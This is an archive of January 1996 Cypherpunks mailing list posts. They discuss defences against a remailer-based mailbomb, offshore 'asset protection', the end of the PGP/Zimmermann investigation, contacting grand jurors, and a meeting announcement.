Richard Bainter          Mundanely     |    OS Specialist         - OMG/CSD
Pug                      Generally     |    Applied Research Labs - U.Texas
   pug@arlut.utexas.edu     |     pug@eden.com     |     {any user}@pug.net
Note: The views may not reflect my employers, or even my own for that matter.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPcRpI3DXUbM57SdAQFbWgP9HrpdsuC/p3iURubYobgXRXlvlmrRgJot
5kDBCOrDHRtyjXQj7n0CLU6TsEpTLR2ZfTGNUrKoc2lE1q0+PSzF4WpOyywNKULw
StB8d+0n0NPuN2Bcbb7mO0M0VbE9khL5CYrcfWB5FR6JPfXU18cfSTXCROgGu4U9
ASvbxOkVLeM=
=L7so
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 13 Jan 1996 11:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <qdx9w8m9LIoI085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If "digital postage" is ever implemented, this sort of
distributed-origin mailbomb-through-a-remailer would be stopped
immediately.  All the messages that the horny net geeks send would
necessarily contain the same postage stamp, and the remailer would
notice this right away -- and throw away messages containing the used
postage stamp.

One more motivation for e$-like digital postage for remailers.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPcY++VevBgtmhnpAQE4NQL/WOEumDEZL+EoJYjhg7ELHTIwoT0rEK/y
dnvui3eJhUONPPBE3Dk/2kCc43ZlCxReo3Dizdf3CuGv9ypIiG/qYC1n3Gl1StM+
2rKS3S0LMUrN9GrguTUwzL6Wy055XGG9
=mjFR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 18:23:19 +0800
To: cypherpunks@toad.com
Subject: Re: Offshore Banks and Asset Protection)
In-Reply-To: <ad1c4cad210210045dc1@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960112180745.29691C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


That's not what I wrote!!! :-)

On Fri, 12 Jan 1996, Timothy C. May wrote:

> I think the assumption that most of the ads in the back of "The Economist"
> are scams which will take your money is wrong. The banks will take your
> money, but most probably will return it on demand. And the seminar
> companies will in fact teach some things.

I did say "many," not "most," and I would assume that most if not all
stuff that The Economist carries is completely legit. I'd been thinking of
"other publications," such as the tax protester rags and my friend 
Clark's paper. 

> not inspire confidence. (In fact, the report that these
> back-of-the-Economist ads are "scams" is perhaps part of this
> disinformation/rumor campaign.)

Yep, I'm just an FBI plant. (Yes, I know -- or rather assume -- that
that's not what you meant.)

Be careful of this paranoid stuff, even as a joke. The tax protester
movement feeds on conspiracy BS. "The IRS knows that native born white
Sovereign Citizens don't have to pay Federal taxes, but they've paid off
all the Jew lawyers." There was a guy in misc.legal a while back making
this so-called argument. People were actually sending him money, and not
out of pity. 

Which is not to say that the guvmint isn't conspiring against us all, in
the larger and some specific senses. Just not quite like that, and it's
the wacky conspiracy theories that make otherwise intelligent people
discard others. (Some people still don't believe in Watergate. *I* didn't
believe the Feds could legally get a wiretap without a warrant until I 
was corrected here.)

> Like a lot of things, it may all be clearer once one has actually gone
> ahead and done something with these offshore banks. I don't personally know
> anyone who has, which adds to my uncertainty.

This falls under the category of Things That Only The Mega-Wealthy Clique
(of all races, politics, and sexual colors) Know. 

Which is a category that shrinks more and more by the day. Some people
actually used to believe in the Divine Right of Kings. We've come a long
way, baby. Keep it up.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 13 Jan 1996 08:09:01 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.LNX.3.91.960112143342.4191C-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.SV4.3.91.960112182555.19172C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


In Siskiyou County, the names of the foreman of the Grand Jury (local) 
are printed in the newspaper on appointment.

You don't need to know the names. Go to the courthouse and ask the deputy 
Marshall to "give the foreman this letter".  I'd have a "straight" 
looking person do it, since the deputy isn't  *required* to assist.

HEck, you could probably just address a letter to "Foreman of Grand Jury, 
Federal Courthouse". 

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 13 Jan 1996 08:11:47 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.SUN.3.91.960112171657.9502I-100000@viper.law.miami.edu>
Message-ID: <Pine.SV4.3.91.960112183023.19172E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, Michael Froomkin wrote:

> sounds like jury tampering to me.  a good way to go to jail quickly.

    Horsepoop. The Grand Jury exists by itself. It doesn't need a judge's 
or a prosecutor's permission to receive letters.  I know this must cause 
heartburn and gnashing of teeth, to lawyers.  Imagine, making decisions 
without a lawyer in control......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 14 Jan 1996 05:30:12 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <199601122336.SAA24814@homeport.org>
MIME-Version: 1.0
Content-Type: text


Some remailers (read: Mixmaster) include a destination.block capability.

The target can be taught about mail filters.

	The target can ask the remailer op to remove the particular
alias, after verifying that he receives mail sent to it.  Too clever
by half solutions such as ZKP would work, as would the remailer-op
sending an arbitrary message encrypted to the complainer to the
address in question.  If the complainer gets the message, either he's
sniffing well, mucking with the DNS, or is the intended recipient of
the nym server.

Adam

Alan Bostick wrote:

| Thousands of horny net geeks will send in the message; some of them
| will even follow instructions correctly so the remailer forwards the
| message to its intended target.  The result is that the target will
| be mailbombed -- and the remailer operator can't stop the abuse by
| blocking the abuser's address, because it's coming from all over the
| net.

| Cypherpunks:  is there any way to respond to, or prevent, this sort of
| attack short of actually shutting down the remailer?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sat, 13 Jan 1996 15:50:45 +0800
To: lull@acm.org (John Lull)
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <30f6de9e.28100489@smtp.ix.netcom.com>
Message-ID: <199601130053.SAA31834@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> The remailer could calculate a hash for the body of each encrypted
> message received (the same portion which will be decrypted by PGP),
> tabulate the last few thousand hashes, and simply discard any messages
> with a duplicate hash.  The target of the attack would receive only
> the first copy of the message.

That wouldn't keep the mailer from getting choked up pretty quickly, 
though, especially if it's on the end of a < T1 line.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Jan 1996 09:57:04 +0800
To: cypherpunks@toad.com
Subject: Offshore Banks and Asset Protection
Message-ID: <ad1c4cad210210045dc1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 PM 1/12/96, Rich Graves wrote:
>Every issue of The Economist (and I'm sure lots of other publications)
>has ads for this kind of thing.
>
>Anyone know a reference for ranking the "legitimacy" of these services
>and seminars? I'd assume that many of them are scams that will gladly
>take your money overseas, but you might never see it again.
>
>Probably follow up offline, because cpunk relevance is a bit tenuous.

I'll follow up on the list, because it's a topic of interest (or
curiousity) to several, and I favor writing for the list.

I looked into "asset protection" [see note below] using offshore banks
(Carribean, Channel Islands, Europe, etc.), and bought a couple of books on
this. And I subscribed to some Net newsletters. I'm not an expert, and have
not chosen (yet) to "protect" my assets by moving them offshore.

I think the assumption that most of the ads in the back of "The Economist"
are scams which will take your money is wrong. The banks will take your
money, but most probably will return it on demand. And the seminar
companies will in fact teach some things.

However, they may be "scams" in a gentle sense: they won't provide easy
solutions that many of us will feel fully comfortable with. By this I mean
that one is hit with dozens of competing claims, by reports that the IRS
and FinCen are infiltrating these banks, that treaty negotiations will soon
close these tax havens, and all sorts of stuff like this. Things which do
not inspire confidence. (In fact, the report that these
back-of-the-Economist ads are "scams" is perhaps part of this
disinformation/rumor campaign.)

Like a lot of things, it may all be clearer once one has actually gone
ahead and done something with these offshore banks. I don't personally know
anyone who has, which adds to my uncertainty.

[Note: Many advisors call their schemes "asset protection," rather than
"tax sheltering" (or "tax evasion"). The idea is to put assets beyond the
reach of tort judgments. For example, a doctor may fear the incredibly
large "deep pockets" lawsuits that American society encourages, so he
transfers a large fraction of his net worth to an offshore bank. He reports
income from these assets to the IRS, so he is not a tax evader, just
someone who has partially "judgment-proofed" himself (to use the term
Duncan and Sandy use). This is not illegal, currently. Lots of issues to
consider.]

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (editor@cdt.org)
Date: Sat, 13 Jan 1996 08:38:22 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post No.34 - Victory for Zimmermann, Fundamental Privacy Issues Remain
Message-ID: <v01520d03ad1c55537d54@[204.157.127.21]>
MIME-Version: 1.0
Content-Type: text/plain


Apologies to those of you who are also on the CDT Policy Post distribution
list, but I felt that this issue was sufficiently important to cc to the
cypherpunks list.

Hope you find this relevant,

Jonah Seiger
CDT editor

------------------------------------------------------------------------
   ******   ********   **************
  ********  *********  **************
  **        **      **      ***               POLICY POST
  **        **      **      ***
  **        **      **      ***               January 12, 1996
  **        **      **      ***               Number 34
  ********  *********       ***
   ******   ********        ***
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 34                      January 12, 1996

CONTENTS: (1) A Victory for Phil Zimmermann, Fundamental Privacy
              Issues Remain
          (2) Press Release Announcing DOJ's Decision to Drop Case
          (3) Subscription Information
          (4) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)
------------------------------------------------------------------------

(1) VICTORY FOR ZIMMERMANN, FUNDAMENTAL PRIVACY ISSUES REMAIN

After 3 years of investigation, the United States Department of Justice
Thursday (1/11) announced that it would not seek an indictment of Phil
Zimmermann, the author of the widely popular encryption program known as
Pretty Good Privacy (PGP). While this development is obviously good news
for Zimmermann, who was the undeserved target of a long and arduous
investigation, criminal threates against those who seek to protect their
privacy remain in place.

The Justice Department had been investigating Zimmermann for possible
violations of Arms Control Regulations of after PGP was posted to Usenet
newsgroups and subsequently distributed through the worldwide Internet in
the spring of 1991.

CDT wishes to extend heartfelt congratulations to Phil, who has
demonstrated remarkable patience and perseverance in the face of harassment
and intimidation by the Federal Government.  Instead of laying low and
waiting for the outcome of the investigation, Phil took the offensive and
became the leading figure in the effort to provide easy to use, strong
cryptographic applications to the masses. CDT hopes that Phil will remain
active in the fight to encourage the relaxation of export restrictions and
access to strong cryptography.

FUNDAMENTAL ISSUES REMAIN -- EXPORT OF STRONG CRYPTOGRAPHY STILL
PROHIBITED, FUTURE PROSECUTIONS OF CRYPTOGRAPHERS BY THE FEDERAL GOVERNMENT
STILL POSSIBLE

Although the announcement by the Justice Department is a tremendous
personal victory for Phil Zimmermann, government restrictions on encryption
exports remain firmly in place. As such, the current Administration policy
is a major roadblock to privacy and security, as well as the future of
commerce, on the Internet. The Clinton Administration continues to push for
a national cryptography policy based on key-escrow and limited key lengths.
In addition, the Administration's current policy proposal seeks to use
export controls as a means to influence the domestic marketplace for
cryptographic applications.

The decision to drop the case against Zimmermann also leaves unresolved the
question of whether posting materials on the Internet could result in the
violation of export control regulations.  Although Zimmermann's defense was
based in part on the argument that the First Amendment protects such
postings, that question remains undressed.  As a result, developers of
strong cryptographic applications who make their programs available on the
Internet may in the future face harassment and indictments from the Federal
Government.  This issue is currently pending before Federal Judges in the
Karn and Bernstein cases.

BACKGROUND ON THE DISPUTE

The export of cryptographic applications with key lengths above 40 bits is
currently illegal under the International Trafficking in Arms Regulations
(ITAR).  The Government maintains that these restrictions are necessary in
order to protect national security, and has successfully fought efforts to
repeal or relax the export controls (including efforts by fmr. Rep. Maria
Cantwell (D-WA) in 1994).  Privacy advocates and the computer hardware and
software industry argue that the export controls stifle the development of
strong cryptography both domestically and internationally, undermining
privacy and security on the global information infrastructure.

When Zimmermann published PGP in 1990, it was among the first widely
available and relatively easy to use cryptographic applications, and for
the first time provided the average citizen with the ability to protect
sensitive information on the relatively insecure Internet. In the eyes of
the Government however, PGP represented a threat to national security and
law enforcement. Although the government has announced that it will not
prosecute Zimmerman, government efforts to restrict the distribution of
strong cryptography will no dobut continue.

As privacy advocates, we must not allow Zimmermann's victory to conceal the
larger issues.  Privacy, security, and commerce on the Internet remain
hostage to export restrictions, the National Security Agency, and Clinton
Administration efforts to impose an unworkable key-escrow regime.

For more information on the Administration's current cryptography policy
initiative and what CDT is doing to fight it, visit CDT's cryptography
issues web page.

    URL:http://www.cdt.org/crypto.html

For More Information Contact:

Daniel J Weitzner, Deputy Director <djw@cdt.org>

Center For Democracy and Technology
+1.202.637.9800

-----------------------------------------------------------------------

(2) DOJ PRESS RELEASE ANNOUNCING THE DECISION TO DROP THE ZIMMERMANN
    CASE


                                     United States Attorney
                                     Northern District of California
______________________________________________________________________

San Jose Office                       (408) 535-5061
280 South First Street, Suite 371
San Jose, California 95113       FAX: (408) 535-5066


                            PRESS RELEASE


FOR IMMEDIATE RELEASE
January 11, 1995


Michael J. Yamaguchi, United States Attorney for the
Northern District of California, announced today that his office
has declined prosecution of any individuals in connection with
the posting to USENET in June 1991 of the encryption program
known as "Pretty Good Privacy."  The investigation has been
closed.  No further comment will be made by the U.S. Attorney's
office on the reasons for declination.

Assistant U.S. Attorney William P. Keane of the U.S.
Attorney's Office in San Jose at (408) 535-5053 oversaw the
government's investigation of the case.

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

In order to subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above
address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 34                                        1/12/96
-----------------------------------------------------------------------









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sat, 13 Jan 1996 12:06:10 +0800
To: cypherpunks-announce@toad.com
Subject: Reminder, Jan 13 noon-6 p.m. Bay Area CA mtg
Message-ID: <199601130332.TAA27926@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


        Name:  monthly Bay Area Cypherpunks meeting
        Date:  Saturday January 13
        Time:  12 p.m. - 6 p.m. 
        Spot:  Sparcy's, Building 21, Sun Microsystems
        Food:  Bagels provided; feel free to bring lunch to munch 

The agenda is still forming.  So far, there are two speakers lined up to
talk about Mark Twain ECash.   (Lucky Green and Sameer.)

It might be interesting to have general discussions of ...
	
	CompuServe, where the censorship wave is going, and
	what to do in response

	Timing attacks on RSA algorithms

	So, can we all now band together and invest in PGP, The Company?

	What's needed in crypto APIs?    What do you love or hate about
	current sets of APIs? 

	(your favorite topic here ...) 

See you tomorrow,
Marianne

p.s.

directions to Sun's B21:  Take 101 South to Amphitheater Exit.  Go to the
end of the ramp and turn left on Charleston.  This road is also known as
Garcia.  After about 1/3 mile, turn right onto the first city street on
your right.  In about 2 long blocks or so, you'll see purple signs for
Building 21 of Sun Microsystems.  The meeting is held in the cafeteria. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 13 Jan 1996 08:53:55 +0800
To: cypherpunks@toad.com
Subject: Re: PRZ grand jury - how about free accts for them...
Message-ID: <199601130041.TAA46336@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

patrick finerty wrote:

<snips>

>it would be nice if someone (c2??) would offer dialup 
>access for any members of the grand jury who wanted it.
>
and Professor Froomkin responded:

>sounds like jury tampering to me.  a good way to go to jail quickly.
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law | 
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's warm here.

I agree with the Professor (although as a native Floridian, I dispute
his .sig about it being warm here!:)) but AFAIK, and unless there are
court orders to the contrary, members of the jury may speak freely
*after* dismissal from grand jury duty. Our problem is finding them
(which shouldn't be *too* hard, given the technology we have). IMO,
after the jury is dismissed we must _not_ contact them directly, but
rather make it clear that we would be happy if they were to contact
us. Hopefully, one of our journalist-types could manage this without
yet-another article giving out the <cypherpunks@toad.com> address.
Presumably, grand-jurors who have carefully followed the court's
instructions would have a bit of catch-up reading on the subject
to do, thus giving us an opportunity for indirect contact with them.
I don't think that this would be illegal, but best to check with a
real-lawyer, and perhaps research the issue a bit, since PRZ's case
(supposedly) has "national security" overtones which could possibly
cause a court to want to hush things.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMPb+uG1lp8bpvW01AQHB4wP+MMFkH9sWknEksRmEDEYQTldnFIvZGoH0
R4oQeQiZhUOj9TNNpgLSldVHN0KqKtbs0oUS5n5tT+eNDgm7vguZVik/3pWvhQwQ
ERUi/Bp2E0l7DPZ/lploUdqqmxJmSwO4MFaJtoHMiabH20S0cmcqDqkwiV+LCQkv
u/CaLagzGi4=
=E5Wl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 13 Jan 1996 14:52:27 +0800
To: cypherpunks@toad.com
Subject: Re: Next on "Geraldo": "Darkside Hackers in Love with their Trackers"
In-Reply-To: <ad1be7392002100487a2@[205.199.118.202]>
Message-ID: <XJBmHD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> On this one I have to agree with Perry.

Me too.

:-)

ObCrypto: I _finally_ received Schneier's 2nd edition today.
Advertising someone you don't have ready to ship isn't nice.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 13 Jan 1996 12:43:25 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
Message-ID: <v02120d02ad1ce02500bc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:22 1/12/96, Alan Bostick wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>If "digital postage" is ever implemented, this sort of
>distributed-origin mailbomb-through-a-remailer would be stopped
>immediately.  All the messages that the horny net geeks send would
>necessarily contain the same postage stamp, and the remailer would
>notice this right away -- and throw away messages containing the used
>postage stamp.
>
>One more motivation for e$-like digital postage for remailers.

I am not sure that postage would solve this problem. The geeks would
individually pay for it. Still, nominal postage would solve a lot of the
problems that plague remailnet.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 13 Jan 1996 14:57:33 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from
In-Reply-To: <2.2.32.19960113002203.00906fc0@mail.teleport.com>
Message-ID: <NqBmHD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> writes:
...
> Pretty nasty variation on a "denial of service" attack.  What next?  Fake
> "David Rhodes does e-cash" messages with the target's e-mail address?

I've seen worse on soc.culture.*. :-)

I think, an appropriate response for the victim would be to accept only
digitally signed e-mail from people he wishes to receive e-mail from, and
to junk all other e-mail (unsigned or from strangers).

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Sat, 13 Jan 1996 09:26:22 +0800
To: kolivet@alpha.c2.org
Subject: Re: Mail to news gateways
Message-ID: <2.2.32.19960113011131.006dc0e0@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 AM 1/12/96 -0800, you wrote:
>
>Could someone point me to a _current_ list of mail to news gateways?
>

>From ethe help file for Private Idaho 2.6b:

You can get the most current USENET gateway information (as well as
additional remailer info such as PGP keys) by:

	E-mailing mg5n+remailers@andrew.cmu.edu
	(no subject or text in the message body required)


-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Sat, 13 Jan 1996 09:27:25 +0800
To: cypherpunks@toad.com
Subject: Re: PRZ "battle lost"
Message-ID: <2.2.32.19960113011159.006d3228@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:00 PM 1/12/96 -0800, "Vladimir Z. Nuri" <vznuri@netcom.com> wrote:
>
>is there an alternative? yes, but it involves fewer lawyers than are
>in the US today.
>
>however I don't see lawyers as the problem, but a symptom of something
>deeper: the tendency of people to resort to legal action to settle
>even trivial disputes.

Very true. Up here (Canada), we have _much_ less of the "use the courts as a
weapon of harrassment" phenomenon. But, I don't believe we have a (much)
lower percentage of lawyers than you do.

It's part of the mindset. Somehow, over the course of several generations,
you folks have become an entirely too litigious lot for your own good. The
result is was PRZ just came through and the multitude of cases that the
Church of Sceintology is involved in.

How to fix it? Beats me. However, I think it will probably have to start
with the judiciary. Justices from all levels of your court system will have
to put their collective feet down and stop allowing this kind of nonsense. I
don't know enough about the inner workings of the legal systems to know if
this would be all that's needed. Perhaps some new legislation would also be
required.

Whatever happens, it can only be for the better. In the meantime, could you
get your damn lawyers off my tv? ;-) We don't let our lawyers do that.
They've only been able to advertise at all in the last 10 years or so.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Help! Help! The paranoids are after me!

iQEVAwUBMPcDkXNDC2/K0TjxAQHLaAf/Q4d3CUrcANLozJGR/uv5JsVyq8c+uhxy
cKvsA/oxHPVTUynvUkqG8av0zhXl0t9hdOoi5RC7Q6jmNrYGvj3cSEXY/VN2EDR8
+4wVPxHQ7Mt3G4ffeR6Qe3hPU3Q/fHXGL7rLoJOD3IDI3LgC+K57Com5KJfXQVGe
7lpbnKSoCiny3pEbanCMMhrp8sZVM00B6oH2Hh6hIMaVEFpBao/ncyGUBiZLkmSr
PLqlU7bTk81BicrMka0ep28KQwOF8lyGYCN1dxq64UCuBe02VATIZ/GnStQFa/YZ
dwTpZtqM7SgDibkEnRwuKeonXd06oyWba0/f1QQm/Y1Cjglw8YAwXA==
=VB/L
-----END PGP SIGNATURE-----

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 13 Jan 1996 06:03:40 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Toad Hall
In-Reply-To: <199601112030.PAA04786@pipe3.nyc.pipeline.com>
Message-ID: <199601120936.UAA02076@suburbia.net>
MIME-Version: 1.0
Content-Type: text


>    From: "Takedown: The pursuit and Capture of Kevin Mitnick,
>    America's Most Wanted Outlaw -- By the Man Who Did It," by
>    Tsutomu Shimura, with John Markoff, Hyperion Press, a
>    subsidiary of The Disney Company, 1996, 326 pp. $24.95. 
>    ISBN 0-7868-6210-6

This makes me ill. Tsutomu, when Mitnick croaks, will you dig up his
grave and rent his hands out as ash trays? Don't worry, I'm sure Markoff
will lend you his shovel and for a percentage even teach you how to use
it.

Knowledge of the final days of American wild west not my strong point,
however I _do_ recall that the man who murdered one of the last
notorious American gun-slinger-outlaws went on not long after to produce
and act in stange show which described just how he Did It.

Some years later he himself was murdered by a disgusted member of the
audience.

The jews have a good statement the benefits of recalling the past.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sat, 13 Jan 1996 11:14:31 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Pine.LNX.3.91.960112135217.4191B-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.3.89.9601122137.A12495-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain



 
On Fri, 12 Jan 1996, zinc wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> regarding remailer spams:
> 
> one way to prevent this sort of spamming is to put a cap on the number
> of messages that can be delivered to a given address.  of course, an
> exception will have to be made for instances of chaining so that the
> number of messages allowed to be forwarded to another remailer is not
> limited.  
> 
> i'm trying to think of a scenario where this would not be a good
> thing.  i suppose if somone was conducting an anonymous poll their
> address should not have a limit.
> 
> i'm sure there are problems with a mesg quota system, but it does seem
> like an easy solution.
> 
Unrelated legitimate messages may arrive after the 'limit ' has been reached.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 13 Jan 1996 11:12:44 +0800
To: cypherpunks@toad.com
Subject: c4 cellphones
Message-ID: <Pine.SOL.3.91.960112213152.5424A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Israeli news sources report:

  PLO security authorities have prohibited the use of cellular 
  telephones in public buildings.  In addition, no person is 
  permitted within 200 meters of Arafat's office with a
  cellular phone.

Paranoia abounds.

How safe is *your* cellphone?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 13 Jan 1996 07:08:15 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <30f6de9e.28100489@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996 10:55:12 -0800, you wrote:

> Cypherpunks:  is there any way to respond to, or prevent, this sort of
> attack short of actually shutting down the remailer?  

Yes, very simply.

The remailer could calculate a hash for the body of each encrypted
message received (the same portion which will be decrypted by PGP),
